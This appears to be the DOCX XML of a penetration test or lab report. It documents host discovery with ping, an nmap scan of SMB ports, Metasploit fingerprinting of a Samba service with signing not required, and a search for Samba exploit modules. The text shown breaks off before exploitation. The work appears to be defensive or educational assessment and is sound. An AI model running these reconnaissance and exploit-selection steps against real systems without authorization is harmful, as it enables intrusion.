      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="298802AA" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C88E986"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23:57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B73837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Post-exploitation verification (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> -a)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61DB0CB2"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3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82F9CF"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engagement followed a standard penetration testing workflow, modeled on the phases of the Penetration Testing Execution Standard (PTES) and comparable to the MITRE ATT&amp;CK tactics shown alongside each phase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00"/>
        <w:gridCol w:w="4650"/>
        <w:gridCol w:w="3500"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="0556C4C7" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AB6385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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B9B452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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EB8DF2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ATT&amp;CK Tactic (approx.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="312C3AAE" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6CC7AA5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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42DE66E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Host discovery and reachability verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="691DA41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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="71890F67" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08D3ED8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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="454BC5A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Port scanning and service identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06EA9CA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Reconnaissance / Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="6C7B765B" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3220E6F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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3349780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Service fingerprinting / version enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="248DBC3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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="3C4096ED" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5778671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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4118864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Vulnerability research and exploit selection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64E4E56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Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="3501370C" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14EAD00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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F3B4C6D"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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70EFA7B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Initial Access (T1190 – Exploit Public-Facing Application)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="57A33186" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AA9AA0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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29ED23F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Post-exploitation verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0988940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Execution / Privilege Escalation (T1059, T1068 context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AAFB3E1"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4. Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31947C2E"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4.1 Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286CC874"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An initial connectivity sweep was performed with ping. The address 192.168.11.30 was unreachable, confirming it was not a live host, while 192.168.11.130 responded consistently with 0% packet loss, confirming the target was online and reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052D883"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F26679" wp14:editId="7851DDCF">
            <wp:extent cx="5762625"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219450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="354919A5"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1 – Host discovery via ping; 192.168.11.130 confirmed live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506992C0"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4.2 Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FB859"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An Nmap scan targeting common Windows/SMB file-sharing ports was run against the confirmed live host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC01E0D"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 139,445 192.168.11.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274DABF8"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scan revealed two open TCP ports associated with SMB/NetBIOS file sharing services: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2500"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="4C50FDCA" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69CB1B5D"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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FE5A98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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18A6A69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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="58B292C7" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A25048D"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139/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="592C6AB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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1806D1FD" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="0C0357DA" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55B5BB2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445/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37D99F5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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32C35E3F" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>microsoft</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="774E0C2D"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B754B1" wp14:editId="4F390C4D">
            <wp:extent cx="5162550" cy="3838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62550" cy="3838575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08360D37"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2 – Nmap results: SMB ports 139 and 445 open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA5BBFE"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4.3 Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29BDEA"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Metasploit auxiliary module auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to fingerprint the SMB service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65678E26"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r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>use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br/>
        <w:t>set RHOSTS 192.168.11.130</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C54755"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scan confirmed SMB was detected on the target, that the host was running a Unix-based Samba implementation rather than genuine Windows SMB, and — critically — that SMB signing was not required, indicating a weakly hardened service configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E6790"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A99C581" wp14:editId="583AD668">
            <wp:extent cx="5762625" cy="328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86125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7D76E"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 xml:space="preserve">Figure 3 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan confirming Unix Samba host, signing not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4061D0"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4.4 Vulnerability Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F55402"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With Samba confirmed as the running service, the Metasploit module database was searched for related exploits using search samba. The search returned a large list of matching modules spanning multiple platforms and disclosure dates, including several historical Samba remote-code-execution exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4BCB2"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="644026E0" wp14:editId="0C204A14">
            <wp:extent cx="5114925" cy="3838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14925" cy="3838575"/>
